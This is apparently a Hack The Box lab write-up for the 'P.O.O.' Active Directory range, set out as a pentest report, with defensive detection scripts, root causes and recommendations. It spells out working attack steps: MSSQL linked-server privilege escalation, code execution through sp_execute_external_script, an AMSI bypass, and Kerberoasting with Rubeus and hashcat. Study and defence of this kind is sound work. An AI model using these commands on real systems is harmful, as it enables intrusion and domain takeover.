# P.O.O

### Scope

{% code overflow="wrap" %}

```
Professional Offensive Operations

By [eks](https://app.hackthebox.com/home/users/profile/302) and [mrb3n](https://app.hackthebox.com/home/users/profile/2984)

Professional Offensive Operations is a rising name in the cyber security world.

Lately they've been working into migrating core services and components to a state of the art cluster which offers cutting edge software and hardware.

P.O.O. is designed to put your skills in enumeration, lateral movement, and privilege escalation to the test within a small Active Directory environment that is configured with the latest operating systems and technologies.

The goal is to compromise the perimeter host, escalate privileges and ultimately compromise the domain while collecting several flags along the way.

Entry Point: `10.13.38.11`
```

{% endcode %}

### Hosts

* 10.13.38.11

### Scans

```bash
# Initial port scan
sudo nmap -p- -T4 $IP --open -oN initial.nmap 
PORT     STATE SERVICE
80/tcp   open  http
1433/tcp open  ms-sql-s

# Service scan
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open  ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
| ms-sql-ntlm-info: 
|   10.13.38.11:1433: 
|     Target_Name: POO
|     NetBIOS_Domain_Name: POO
|     NetBIOS_Computer_Name: COMPATIBILITY
|     DNS_Domain_Name: intranet.poo
|     DNS_Computer_Name: COMPATIBILITY.intranet.poo
|     DNS_Tree_Name: intranet.poo
|_    Product_Version: 10.0.17763
|_ssl-date: 2023-08-15T13:36:25+00:00; +5s from scanner time.
| ms-sql-info: 
|   10.13.38.11:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM+
|       number: 14.00.2027.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: true
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-08-10T02:45:27
|_Not valid after:  2053-08-10T02:45:27
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5s, deviation: 0s, median: 4s

# WFUZZ 
# Seclists
Target: http://10.13.38.11/FUZZ
Total requests: 37050
=====================================================================
ID           Response   Lines    Word       Chars       Payload               
=====================================================================
000000379:   200        31 L     55 W       703 Ch      "."
000002558:   200        50 L     156 W      10244 Ch    ".DS_Store"
000010081:   200        31 L     55 W       703 Ch      "iisstart.htm"
000011450:   200        50 L     156 W      10244 Ch    ".ds_store"
000017145:   301        1 L      10 W       151 Ch      ".Trashes"               

Target: http://10.13.38.11/FUZZ
Total requests: 62284
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000003:   401        29 L     100 W      1293 Ch     "admin"
000000024:   301        1 L      10 W       149 Ch      "themes"
000000009:   301        1 L      10 W       145 Ch      "js"
000000016:   301        1 L      10 W       150 Ch      "plugins"
000000006:   301        1 L      10 W       152 Ch      "templates"
000000002:   301        1 L      10 W       149 Ch      "images"
000000070:   301        1 L      10 W       150 Ch      "uploads"
000000127:   301        1 L      10 W       146 Ch      "dev"
000000576:   301        1 L      10 W       150 Ch      "widgets"
000001248:   301        1 L      10 W       151 Ch      "META-INF"
000021033:   301        1 L      10 W       155 Ch      "New Folder"  

# Metasploit shortname scanner
msf6 auxiliary(scanner/http/iis_shortname_scanner) > run
[*] Running module against 10.13.38.11

# path = /
[*] Scanning in progress...
[+] Found 5 directories
[+] http://10.13.38.11/ds_sto*~1
[+] http://10.13.38.11/templa*~1
[+] http://10.13.38.11/trashe*~1
[+] http://10.13.38.11/newfol*~1
[+] http://10.13.38.11/newfol*~2
[+] Found 1 files
[+] http://10.13.38.11/web*~1.con*
[*] Auxiliary module execution completed

# path = /dev/
[*] Scanning in progress...
[+] Found 3 directories
[+] http://10.13.38.11/dev/dca66d*~1
[+] http://10.13.38.11/dev/ds_sto*~1
[+] http://10.13.38.11/dev/304c0c*~1
[*] No files were found

# Further look at the Dev DS Store
wget 10.13.38.11/dev/.ds_store

```

### Write-up

The tester has found the default IIS web page on port 80.

* <http://10.13.38.11/>

<figure><img src="/files/52o30P9hLOB2E4VOsCYe" alt=""><figcaption></figcaption></figure>

Using WFUZZ, the tester found a few directories; one in particular, '/dev/', seemed interesting. Using the IIS short name disclosure vulnerability, the contents of the directory were revealed.

<figure><img src="/files/gnozMLIROMsF83HCapWb" alt=""><figcaption></figcaption></figure>
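From the defender's side, the short-name scanning above leaves a distinctive trail in the IIS logs: many requests whose path contains a wildcard immediately before the 8.3 tilde suffix (`*~1`). The following is an added example, not part of the original write-up, that parses a W3C-format IIS log and flags clients sending that pattern; the log lines are constructed for the example and the field list is a trimmed subset of the default IIS fields.

```python
import re
from collections import Counter

# Constructed IIS W3C log excerpt (not captured from the target above). A
# short-name scanner walks the namespace with paths such as /<prefix>*~1*/,
# so that wildcard-tilde pattern is the signature to look for.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2023-08-15 13:40:01 10.13.38.11 GET / - 80 10.10.14.9 200
2023-08-15 13:40:01 10.13.38.11 GET /iisstart.htm - 80 10.10.14.9 200
2023-08-15 13:40:02 10.13.38.11 OPTIONS /*~1*/.aspx - 80 10.10.14.5 404
2023-08-15 13:40:02 10.13.38.11 OPTIONS /a*~1*/.aspx - 80 10.10.14.5 400
2023-08-15 13:40:02 10.13.38.11 OPTIONS /d*~1*/.aspx - 80 10.10.14.5 404
2023-08-15 13:40:03 10.13.38.11 OPTIONS /ds*~1*/.aspx - 80 10.10.14.5 404
2023-08-15 13:40:03 10.13.38.11 OPTIONS /dev/*~1*/.aspx - 80 10.10.14.5 404
2023-08-15 13:40:03 10.13.38.11 OPTIONS /dev/d*~1*/.aspx - 80 10.10.14.5 404
2023-08-15 13:40:04 10.13.38.11 GET /dev/.ds_store - 80 10.10.14.5 200
"""

# A '*' directly before the '~<digit>' short-name suffix; a plain '~' in a
# legitimate URL (user home directories, for example) does not match.
SHORTNAME_PROBE = re.compile(r"\*~[1-9]")


def parse_iis_log(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def find_shortname_probes(records, threshold=3):
    """Count short-name probe requests per client IP and return the clients at
    or above the threshold, so one stray match does not raise an alert."""
    hits = Counter()
    for rec in records:
        if SHORTNAME_PROBE.search(rec.get("cs-uri-stem", "")):
            hits[rec["c-ip"]] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}


if __name__ == "__main__":
    for ip, n in find_shortname_probes(parse_iis_log(SAMPLE_LOG)).items():
        print(f"{ip}: {n} IIS short-name probe requests")
```

The same matcher can be pointed at live logs under `%SystemDrive%\inetpub\logs\LogFiles`; the definitive fix remains disabling 8.3 name creation on the web root volume and patching IIS.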

The tester was able to download the '.ds\_store' file within the 'dev' directory.

<figure><img src="/files/Xi0ip1B61pbyKVmKYFNP" alt=""><figcaption></figcaption></figure>

The other folders found resemble MD5 hashes; cracking them revealed the authors of this challenge.

```bash
304c0c90fbc6520610abbf378e2339d1 = mrb3n
dca66d38fd916317687e1390a420c3fc = eks
```

Fuzzing further within those folders revealed the following directories:

```bash
# Command
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"

# Output
Target: http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/FUZZ/
Total requests: 62284
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000041:   403        29 L     92 W       1233 Ch     "include"
000000111:   403        29 L     92 W       1233 Ch     "db"
000000234:   403        29 L     92 W       1233 Ch     "core"
000000624:   403        29 L     92 W       1233 Ch     "src"     
```

Using the same vulnerability as before, the tester checked the 'db' directory.

<figure><img src="/files/SmjCdCS27aTKJtZlRTMo" alt=""><figcaption></figcaption></figure>

A partial file name was found, so the tester used WFUZZ to fuzz for the complete name.

```bash
# Command
grep '^co.*' /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt > fuzz.txt
URL=http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt
wfuzz -c -w ./fuzz.txt  --hc 404 "$URL"

# Output
Target: http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt
Total requests: 2224
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000096:   200        6 L      7 W        142 Ch      "connection"     
```

The downloaded file contains a database username and password.

```bash
# Command
wget http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_connection.txt
```

<figure><img src="/files/ZbeijJPhwTZy3YsBXdjy" alt=""><figcaption></figcaption></figure>

Knowing from the initial scans that port 1433 was open, the tester tried to connect to the MS SQL database.

```bash
# Command
impacket-mssqlclient external_user:#p00XXXXXXXXXXXXX@10.13.38.11
```

<figure><img src="/files/tGyN4kvOPKIK0NlDB5zE" alt=""><figcaption></figcaption></figure>

Database enumeration:

```bash
# Databases
select name from master.dbo.sysdatabases;
name         
----------   
master       
tempdb       
POO_PUBLIC

# Current user is not sysadmin
select name,sysadmin from syslogins;
name            sysadmin   
-------------   --------   
sa                     1   
external_user          0   

# Finding any other linked servers
select srvname, isremote from sysservers;
srvname                    isremote   
------------------------   --------   
COMPATIBILITY\POO_PUBLIC          1   
COMPATIBILITY\POO_CONFIG          0   

# Executing enumeration on the linked server
exec ('select suser_name()') at [COMPATIBILITY\POO_CONFIG];                
-------------   
internal_user   

# Checking if user is sysadmin
exec ('select name,sysadmin from syslogins') at [COMPATIBILITY\POO_CONFIG];
name            sysadmin   
-------------   --------   
sa                     1   
internal_user          0   

# Checking for additional links - looks like it's a circular link
exec ('select srvname, isremote from sysservers') at [COMPATIBILITY\POO_CONFIG];
srvname                    isremote   
------------------------   --------   
COMPATIBILITY\POO_CONFIG          1   
COMPATIBILITY\POO_PUBLIC          0   

# Checking what user it is linked as 
exec ('exec (''select suser_name()'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
--   
sa  
```

The tester found that the 'POO\_PUBLIC' database is linked to the 'POO\_CONFIG' database as user 'internal\_user'. Additionally, 'POO\_CONFIG' is linked back to 'POO\_PUBLIC', which creates a circular link; however, that return link uses a sysadmin account. The tester then leveraged that connection to create a new sysadmin login on the 'POO\_PUBLIC' database.

```bash
# Commands
exec ('exec ('' CREATE LOGIN hackedAgain WITH PASSWORD = ''''LetMeIn123!'''' '') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
exec ('exec ('' sp_addsrvrolemember ''''hackedAgain'''' , ''''sysadmin'''' '') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
```
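The circular-link finding above generalises to any linked-server topology: a low-privilege login escalates whenever some chain of `EXEC ... AT` hops ends on a server where the mapped remote login is sysadmin. The following added audit script (not part of the write-up or of any HTB tooling) models the links from the `sysservers`, `suser_name()` and `syslogins` output shown above as constructed data, lists links mapped to a sysadmin login, and walks chains to report every escalation path; the server and login names are those on the page, the `config_reader` login in the test is a hypothetical replacement.

```python
from collections import deque

# Constructed from the linked-server output above: each link is
# (local_server, remote_server, login_used_on_the_remote). Which logins hold
# the sysadmin role comes from the syslogins queries shown on this page.
LINKS = [
    ("COMPATIBILITY\\POO_PUBLIC", "COMPATIBILITY\\POO_CONFIG", "internal_user"),
    ("COMPATIBILITY\\POO_CONFIG", "COMPATIBILITY\\POO_PUBLIC", "sa"),
]
SYSADMIN_LOGINS = {
    "COMPATIBILITY\\POO_PUBLIC": {"sa"},
    "COMPATIBILITY\\POO_CONFIG": {"sa"},
}


def is_sysadmin(sysadmin_logins, server, login):
    return login in sysadmin_logins.get(server, set())


def links_mapped_to_sysadmin(links, sysadmin_logins):
    """Direct audit finding: links whose remote login is sysadmin on the remote
    server. Each of these should be remapped to a low-privilege login."""
    return [link for link in links if is_sysadmin(sysadmin_logins, link[1], link[2])]


def find_escalation_paths(links, sysadmin_logins, start_server, start_login, max_hops=4):
    """Breadth-first walk over chained EXEC ... AT hops, starting as start_login
    on start_server. Returns every chain that first reaches a sysadmin context,
    each as a list of (server, login) tuples. max_hops bounds circular links."""
    found = []
    queue = deque([[(start_server, start_login)]])
    while queue:
        path = queue.popleft()
        server, login = path[-1]
        if len(path) > 1 and is_sysadmin(sysadmin_logins, server, login):
            found.append(path)      # escalated; no need to follow further hops
            continue
        if len(path) - 1 >= max_hops:
            continue
        for local, remote, remote_login in links:
            if local == server:
                queue.append(path + [(remote, remote_login)])
    return found


def describe_path(path):
    """Render a chain as login@INSTANCE -> login@INSTANCE for a report."""
    return " -> ".join(f"{login}@{server.rsplit(chr(92), 1)[-1]}" for server, login in path)


if __name__ == "__main__":
    for link in links_mapped_to_sysadmin(LINKS, SYSADMIN_LOGINS):
        print("link mapped to sysadmin remote login:", link)
    for p in find_escalation_paths(LINKS, SYSADMIN_LOGINS, "COMPATIBILITY\\POO_PUBLIC", "external_user"):
        print("escalation chain:", describe_path(p))
```

On a real instance the same three inputs come from `sys.servers`, `sys.linked_logins` and `IS_SRVROLEMEMBER('sysadmin')` on each linked server, so the script doubles as a regression check after the remediation in the recommendations section.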

Now the database can be enumerated further:

```bash
# Command
impacket-mssqlclient hackedAgain:'LetMeIn123!'@10.13.38.11

# DB Enumeration
select name from master.dbo.sysdatabases;
name         
----------   
master       
tempdb       
model        
msdb         
POO_PUBLIC   
flag         

select * from flag.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
flag            dbo            flag         b'BASE TABLE'   

```

<figure><img src="/files/1R3NTUPzKjoZYqcKksZU" alt=""><figcaption></figcaption></figure>

With sysadmin access available, the tester used the stored procedure 'sp\_execute\_external\_script' to get remote code execution.

```bash
# Command
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'

# Output
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script: 
compatibility\poo_public01
```

Using the above exploit, the tester was able to read the 'web.config' file enumerated earlier.

```bash
# Command
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("type C:\inetpub\wwwroot\web.config "))'
```

<figure><img src="/files/vGOdUs4bWVZH9DW5uf37" alt=""><figcaption></figcaption></figure>

This revealed the login for the administrator panel on the website at <http://10.13.38.11/admin>.

<figure><img src="/files/JUQIlhhWPkj9S7Ce1MdJ" alt=""><figcaption></figcaption></figure>

Enumerating the system through the MSSQL account revealed additional open ports that weren't discovered previously.

```bash
# Command
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("netstat -anop tcp"))'
```

<figure><img src="/files/phoAANaePuiYDfk3CImg" alt=""><figcaption></figcaption></figure>

The port that stands out is 5985. Because nmap did not find it over IPv4, it is presumably blocked by the firewall, so the next step was to check for IPv6.

```bash
# Command
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("ipconfig"))'
```

<figure><img src="/files/uTiiKzGp9ZNXMpqfQDKY" alt=""><figcaption></figcaption></figure>

Scanning the IPv6 address with 'nmap' was successful; the firewall did not block the scan.

```bash
# Command
nmap -p 5985 -sV -6 dead:beef::1001 -oN 5985.nmap

# Output
PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

Using 'winrm', the tester was able to log in as the administrator with the credentials found earlier.

```bash
sudo nano /etc/hosts
# Add the following line
dead:beef::1001 compatibility.htb

# Connect with evilwinrm
evil-winrm -i compatibility.htb -u administrator -p <password>
```

<figure><img src="/files/6fciiw5nP92oXQkD1nLj" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/UKqfrmsoXu1ZaGTN8ElM" alt=""><figcaption></figcaption></figure>

The tester transferred 'SharpHound' across, ran it, and retrieved the output to the local attacking machine.

```bash
# Upload sharphound using evil-winrm
upload SharpHound.exe C:\Users\Public\s.exe

# Run sharphound from the SQL interface
xp_cmdshell C:\Users\Public\s.exe -C ALL --outputdirectory C:\Users\Public

# Download output
download C:\Users\Public\20230816220753_BloodHound.zip
```

The tester uploaded the files to the BloodHound UI for visualisation. Looking at the "Shortest path to Domain Admins from Kerberoastable users" query revealed that 'P00\_ADM' can be kerberoasted and is a member of the "Domain Admins" group.

The tester then used 'Rubeus' to kerberoast the 'P00\_ADM' user.

```bash
# Command from the SQL interface
xp_cmdshell C:\Users\Public\Rubeus.exe kerberoast /user:p00_adm
```

<figure><img src="/files/etUsZZTppBQ9KxV35pDv" alt=""><figcaption></figcaption></figure>

Once the hash had been copied to a file and reformatted to remove spaces and line breaks, 'hashcat' was used to crack it.

```bash
# Command
hashcat -a 0 -m 13100 p00_adm.hash /usr/share/seclists/Passwords/Keyboard-Combinations.txt --force
```

<figure><img src="/files/zQ9JTrceDjYXSmn6DEQc" alt=""><figcaption></figcaption></figure>
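The Kerberoast request above is visible to the domain controller as a TGS request (Security event 4769) for a user-account SPN with RC4-HMAC (encryption type 0x17) rather than AES. The following added detection example, not part of the original write-up, runs that logic over constructed 4769 records; the `svc_backup` and `svc_web` service names are invented, and the privileged-account set is assumed to come from an export of Domain Admins membership.

```python
from collections import defaultdict

# Constructed sample of Security event 4769 fields as a log forwarder would
# deliver them (not captured from the environment above).
# TicketEncryptionType: 0x17 = RC4-HMAC, 0x12 = AES256-CTS-HMAC-SHA1-96.
SAMPLE_4769 = [
    # routine ticket for a machine account, AES: benign
    {"TargetUserName": "p00_adm@INTRANET.POO", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.13.38.11", "Status": "0x0"},
    # RC4 ticket for a user-account SPN that is a Domain Admin
    {"TargetUserName": "administrator@INTRANET.POO", "ServiceName": "p00_adm",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.13.38.11", "Status": "0x0"},
    # RC4 ticket for a non-privileged service account (constructed name)
    {"TargetUserName": "administrator@INTRANET.POO", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.13.38.11", "Status": "0x0"},
    # failed request (non-zero Status): no ticket was issued, ignored
    {"TargetUserName": "administrator@INTRANET.POO", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.13.38.11", "Status": "0x1b"},
]

# Assumption: populated from your own Domain Admins / Tier-0 membership export.
PRIVILEGED_ACCOUNTS = {"p00_adm"}


def is_user_spn(service_name):
    """Machine accounts ($) and krbtgt are not the targets of interest here."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def kerberoast_alerts(events, privileged_accounts):
    """One alert per successful RC4 ticket issued for a user-account SPN;
    severity is raised when the SPN belongs to a privileged account."""
    alerts = []
    for ev in events:
        svc = ev["ServiceName"]
        if not is_user_spn(svc) or ev["Status"] != "0x0":
            continue
        if ev["TicketEncryptionType"] != "0x17":
            continue
        alerts.append({
            "requester": ev["TargetUserName"],
            "service": svc,
            "source": ev["IpAddress"],
            "severity": "high" if svc in privileged_accounts else "medium",
        })
    return alerts


def bulk_rc4_requesters(events, min_services=2):
    """Requesters that obtained RC4 tickets for several distinct user SPNs,
    the pattern a 'roast everything' run produces."""
    seen = defaultdict(set)
    for a in kerberoast_alerts(events, set()):
        seen[a["requester"]].add(a["service"])
    return {r: sorted(s) for r, s in seen.items() if len(s) >= min_services}


if __name__ == "__main__":
    for a in kerberoast_alerts(SAMPLE_4769, PRIVILEGED_ACCOUNTS):
        print(a)
    print(bulk_rc4_requesters(SAMPLE_4769))
```

The lasting fix is the one in the recommendations: no SPN on a Domain Admin account, and AES-only `msDS-SupportedEncryptionTypes` on the service accounts that must keep one, after which 0x17 requests become the anomaly rather than the norm.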

The tester then transferred 'PowerView' across and used it to run commands on the DC using the credentials for the 'p00\_adm' user.

```bash
# Run Bypass-4MSI - prevents the current process from being scanned by the AV
Bypass-4MSI

# Set up credentials
$pass = ConvertTo-SecureString 'ZQxxxxx' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass)

# Testing Commands on DC
Invoke-Command -Computer DC -Credential $cred -ScriptBlock { whoami; hostname }
## Output
poo\p00_adm
DC

# Or could have used Enter-PSSession to get an interactive PowerShell Session
Enter-PSSession -ComputerName DC -Credential $cred -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)

# looking for flag
Invoke-Command -Computer DC -Credential $cred -ScriptBlock { Get-ChildItem -recurse C:\ flag.txt }
```

<figure><img src="/files/dYJXB25TYhDznHLwoBaC" alt=""><figcaption></figcaption></figure>

```bash
# Command to output flag
Invoke-Command -Computer DC -Credential $cred -ScriptBlock { type C:\Users\mr3ks\Desktop\flag.txt }
```

<figure><img src="/files/mhs8bQlnQ1pjkHInuNS3" alt=""><figcaption></figcaption></figure>

### Clean up

* Delete MSSQL user created - 'hackedAgain'
* Delete files created in the Public directory

```bash
rm C:\Users\Public\s.exe
rm C:\Users\Public\20230816220753_BloodHound.zip
rm C:\Users\Public\Rubeus.exe
rm C:\Users\Public\PowerView.ps1
```

### Root cause

* Unpatched web server - IIS Server - Short File/Folder Name Disclosure
* Credentials stored in clear text
  * Database login for external user (poo\_connection.txt)
  * Administrator login for web admin directory (web.config)
* Directory traversal & externally open database
* Database misconfiguration - circular link created with sysadmin user (POO\_Public -> POO\_Config -> POO\_Public)
* Lack of strong password policies
  * Password reuse - Administrator Web login and local Administrator has same credentials
  * Domain Admin with easily crackable password
* Incomplete firewall rules - not monitoring IPv6
* Kerberoastable domain admin
* Domain admin account permitted to log on to hosts other than domain controllers

### Executive Summary

In light of the comprehensive cybersecurity assessment conducted on the organisation's systems, several critical root causes have been identified that pose significant risks to the information security. These findings require immediate attention and remediation to ensure the confidentiality, integrity, and availability of all digital assets. The following is a concise summary of the identified root causes:

1. **Unpatched Web Server:** The presence of unpatched vulnerabilities within the web server environment, specifically the IIS Server, exposes the systems to potential attacks. A publicly disclosed exploit has led to unauthorised access and data leakage.
2. **Credentials Stored in Clear Text:** Storing sensitive credentials, such as database logins and administrator access, in clear text format is a critical security oversight. This makes these credentials easily exploitable by malicious actors who gain unauthorised access, as showcased in the report.
3. **Exposed Database:** The presence of a database allowing open remote access creates a pathway for attackers to gain unauthorised access and potentially manipulate or exfiltrate sensitive data.
4. **Database Misconfiguration:** The discovered circular link in the database configuration, along with elevated user privileges, presents a significant threat to data integrity and system security. This allowed for lateral movement from a low-privilege user to the database admin.
5. **Incomplete Firewall Rules:** Inadequate firewall rules and failure to monitor IPv6 traffic exposed the network to potential unauthorised access and data breaches.
6. **Lack of Strong Password Policies:** The absence of robust password policies has led to various vulnerabilities, including password reuse and easily crackable passwords.
7. **Kerberoastable Domain Admin:** The presence of a Kerberoastable domain admin account increases the risk of credential theft and lateral movement within the network.
8. **Domain Admin Access Control:** Allowing domain admin accounts to log onto regular workstations remotely poses a significant security risk, as these accounts are highly privileged.

In conclusion, the aforementioned root causes represent critical vulnerabilities that require immediate attention. Addressing these issues through a comprehensive and coordinated effort will significantly strengthen the cybersecurity posture, reduce the risk of unauthorised access and data breaches, and ultimately safeguard the organisation's digital assets.

### Recommendation

* IIS Server Update - Immediate actions are required to ensure all server components are updated with the latest security patches.
* Clear text passwords - Recommend implementing industry-standard encryption mechanisms to protect these credentials and review the Access Control Lists.
  * 'web.config' in the web server root directory.
  * 'poo\_connection.txt' in the user directories within the web server.
* Externally open database - Proper access controls, input validation, and firewall configurations are crucial to mitigate this risk. If not required, block the port from being available remotely.
  * Currently available on port 1433 at the following IP, '10.13.38.11'.
* Database Misconfiguration - Reconfiguring the database structure and user permissions is essential to mitigate the risk of unauthorised data access and manipulation. Ensure that the database links are created with low privilege users.
  * POO\_Config -> POO\_Public - remove the sysadmin account and replace with low privilege user.
  * Disallow the 'EXECUTE' function on low privilege users and remove unnecessary stored procedures such as 'sp\_execute\_external\_script'.
* Password Policy - Adopting strong password policies, implementing password complexity requirements, and educating users about secure password practices are recommended to enhance the overall security posture.
* Firewall rules - It's advised to review and update firewall rules to include IPv6 traffic monitoring, ensuring a comprehensive defence against external threats.
* Domain Admins - Restricting domain admin logins to domain controllers exclusively will enhance security and minimise the potential attack surface.
* Kerberoastable accounts - Implementing advanced authentication mechanisms and periodic account reviews will help mitigate the risk associated with such accounts.


